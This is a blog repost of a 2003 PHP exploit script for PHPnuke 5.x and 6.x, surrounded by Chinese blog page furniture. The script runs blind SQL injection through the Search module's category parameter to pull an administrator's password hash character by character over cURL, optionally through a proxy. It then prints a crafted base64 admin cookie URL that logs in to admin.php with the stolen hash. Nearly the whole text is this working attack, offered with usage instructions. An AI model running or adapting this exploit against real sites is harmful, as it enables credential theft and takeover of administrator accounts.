PHPnuke 6.x_exp and 5.x_exp

最新推荐文章于 2018-12-12 17:26:53 发布

www_307

最新推荐文章于 2018-12-12 17:26:53 发布

阅读量1k

点赞数

分类专栏：编程脚本文章标签： extension search url query security function

本文链接：https://blog.csdn.net/www_307/article/details/70461

版权

编程脚本专栏收录该内容

19 篇文章 0 订阅

订阅专栏

#!/usr/bin/php -q
PHPnuke 6.x and 5.x fetch author hash by pokleyzz <pokleyzz at scan-associates.net>

<?php
/*
# PHPnuke 6.x and 5.x fetch author hash by pokleyzz <pokleyzz at scan-associates.net>
# 27th December 2003 : 4:54 a.m
#
# bug found by pokleyzz (11th December 2003 ) for HITB 2003 security conference
# (Shame on You!!)
#
# Requirement:
# PHP 4.x with curl extension;
#
# Greet:
# tynon, sk ,wanvadder, sir_flyguy, wxyz , tenukboncit, kerengga_kurus ,
# s0cket370 , b0iler and ...
#
# Happy new year 2004 ...
#
# ----------------------------------------------------------------------------
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a "teh tarik" in return.
# ----------------------------------------------------------------------------
# (Base on Poul-Henning Kamp Beerware)
#
# Tribute to Search - "kejoraku bersatu.mp3"
#
*/
if (!(function_exists('curl_init'))) {
echo "cURL extension required ";
exit;
}

ini_set("max_execution_time","999999");

$matches = "No matches found to your query";

//$url = "http://127.0.0.1/src/phpnuke441a/html";
$charmap = array (48,49,50,51,52,53,54,55,56,57,
    97,98,99,100,101,102,
    103,104,105,
    106,107,108,109,110,111,112,113,
    114,115,116,117,118,119,120,121,122
    );

if($argv[1] && $argv[2]){

$url = $argv[1];
$author = $argv[2];
if ($argv[3])
  $proxy = $argv[3];
}
else {
echo "Usage: ".$argv[0]." <URL> <aid> [proxy] ";
echo " URL URL to phpnuke site (ex: http://127.0.0.1/html) ";
echo " aid author id to get (ex: god) ";
echo " proxy optional proxy url (ex: http://10.10.10.10:8080) ";
exit;
}
$search = "/modules.php?name=Search";
echo "Take your time for Teh Tarik... please wait ... ";
echo "Result: ";
echo " $author:";
$admin = $author.":";
$i =0;
$tmp = "char(";
while ($i < strlen($author)){
$tmp .= ord(substr($author,$i,1));
$i++;
if ($i < strlen($author)){
  $tmp .= ",";
}
}
$tmp .= ")";
$author=$tmp;

for($i= 1;$i< 33;$i++){
foreach ($charmap as $char){
  echo chr($char);
  $postvar = "query=%25&category=99999+or+a.aid=$author+and+ascii(substring(a.pwd,$i,1))=$char";
  $ch = curl_init();
  if ($proxy){
   curl_setopt($ch, CURLOPT_PROXY,$proxy);
  }
  curl_setopt($ch, CURLOPT_URL,$url.$search);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $postvar);
  $res=curl_exec ($ch);
  curl_close ($ch);
  if (!(ereg($matches,$res))){
   //echo chr($char);
   $admin .= chr($char);
   break 1;
  }
  else {
   echo chr(8);
  }

  if ($char ==103){
   echo " Not Vulnerable or Something wrong occur ... ";
   exit;
  }

}
}
$admin .= "::";
echo " Admin URL: ";
echo " $url/admin.php?admin=".ereg_replace("=","%3d",base64_encode($admin));
echo " ";
echo " Enjoy your self and Happy New Year 2004....";
?>

www_307

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
PHPnuke 6.x_exp and 5.x_exp

#!/usr/bin/php -qPHPnuke 6.x and 5.x fetch author hash by pokleyzz /*# PHPnuke 6.x and 5.x fetch author hash by pokleyzz # 27th December 2003 : 4:54 a.m## bug found by pokleyzz (11th December 2003 )
复制链接

扫一扫